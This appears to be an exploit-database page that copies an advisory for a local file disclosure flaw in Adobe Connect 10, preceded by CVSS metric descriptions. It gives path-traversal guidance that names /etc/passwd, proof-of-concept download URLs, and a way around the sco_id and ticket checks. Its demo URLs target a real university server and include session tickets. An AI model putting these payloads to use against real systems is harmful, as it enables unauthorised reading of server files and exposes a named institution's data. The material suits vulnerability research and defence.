The vulnerable system is not bound to the network stack and the attacker’s path is via read/write/execute capabilities. Either: the attacker exploits the vulnerability by accessing the target system locally (e.g., keyboard, console), or through terminal emulation (e.g., SSH); or the attacker relies on User Interaction by another person to perform actions required to exploit the vulnerability (e.g., using social engineering techniques to trick a legitimate user into opening a malicious document).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Integrity
Low
IR
Loss of [Confidentiality | Integrity | Availability] is likely to have only a limited adverse effect on the organization or individuals associated with the organization (e.g., employees, customers).
Availability
None
A
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Below is a copy: adobe connect 10 Local File Disclosure / Download
# Title: adobe connect 10 Local File Disclosure / Download [LFD]
# Author: h4shur
# date:2021-01-15
# Vendor Homepage: https://www.adobe.com
# Software Link: https://www.adobe.com/products/adobeconnect.html
# Version: 10 and earlier
# Tested on: Windows 10 & Google Chrome
# Category : Web Application Bugs
### Description :
There are many web applications in the world, each of which has vulnerabilities due to developer errors, and this is a problem for all of them, and even the best of them, like the "adobe connect" program, have vulnerabilities that occur every month. They are found and fixed by the team.
* What is LFD bug?
LFD bug stands for Local File Disclosure / Download, which generally allows the attacker to read and download files within the server, so it can be considered a very dangerous bug in the web world and programmers must be aware of it. Be careful and maintain security against this bug
* Intruder access level with LFD bug
The level of access using this bug can be even increased to the level of access to the website database in such a way that the hacker reads sensitive files inside the server that contain database entry information and enters the database and by extracting the information The admin will have a high level of access
* Identify vulnerable sites
To search for LFD bugs, you should check the site inputs. If there is no problem with receiving ./ characters, you can do the test to read the files inside the server if they are vulnerable. Enter it and see if it is read or not, or you can use files inside the server such as / etc / passwd / .. and step by step using ../ to return to the previous path to find the passwd file
* And this time the "lfi" in "adobe connect" bug:
To download and exploit files, you must type the file path in the "download-url" variable and the file name and extension in the "name" variable.
You can download the file by writing the file path and file name and extension.
When you have written the file path, file name and extension in the site address variables, a download page from Adobe Connect will open for you, with "Save to My Computer
file name]" written in the download box and a file download link at the bottom of the download box, so you can download the file. .
*There are values inside the url that do not allow a file other than this file to be downloaded
Values: sco_id and tickets
But if these values are cleared, you will see that reloading is possible without any obstacles
At another address, you can download multiple files as a zip file.
We put the address of the files in front of the variable "ffn" and if we want to add the file, we add the variable "ffn" again and put the address of the file in front of it. The "download_type" variable is also used to specify the zip extension.
### POC :
https://target.com/[folder]/download?download-url=[URL]&name=[file.type]
https://target.com/[folder]/download?output=output&download_type=[Suffix]&ffn=[URL]&baseContentUrl=[base file folder]
### demo :
https://vc.shdu.ac.ir/system/download?download-url=/_a7/p49dm7f4qjyt/output/&name=exam.pdf
https://vc.shdu.ac.ir/system/download?download-url=/_a7/pf9ik0jq47fp/output/&name=tamrin1.pdf
https://vc.shdu.ac.ir/system/download?output=output&download_type=zip&ffn=pf9ik0jq47fp%3Atamrin1%2Epdf&baseContentUrl=_a7
https://vc.shdu.ac.ir/system/download?output=output&sco%5Fid=4416307&download%5Ftype=zip&ticket=n3r92ib8mbw7rq8rkxc73fuphvow8myi&ffn=pf9ik0jq47fp%3Atamrin1%2Epdf&ffn=p3rgmdouxg9n%3A11%2Epdf&ffn=pjggb4nyk8jw%3A12%2Epdf&ffn=pa4nk5qf34aj%3A13%2Epdf&ffn=pgtlrh7kz4uc%3A14%2Epdf&ffn=ph93s70xti2v%3A15%2Epdf&baseContentUrl=%5Fa7
https://vc.shdu.ac.ir/system/download?download-url=/_a7/pf9ik0jq47fp/output/&name=tamrin1.pdf&sco_id=4416307&ticket=n3r92ib8mbw7rq8rkxc73fuphvow8myi
### thanks to :
the shdu.ac.ir site for reviewing it
and all my friends
### contact me :
* Telegram : @h4shur
* Email : [email protected]
* Instagram : @netedit0r / @h4shur
* twitter : @h4shur / @netedit0r
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum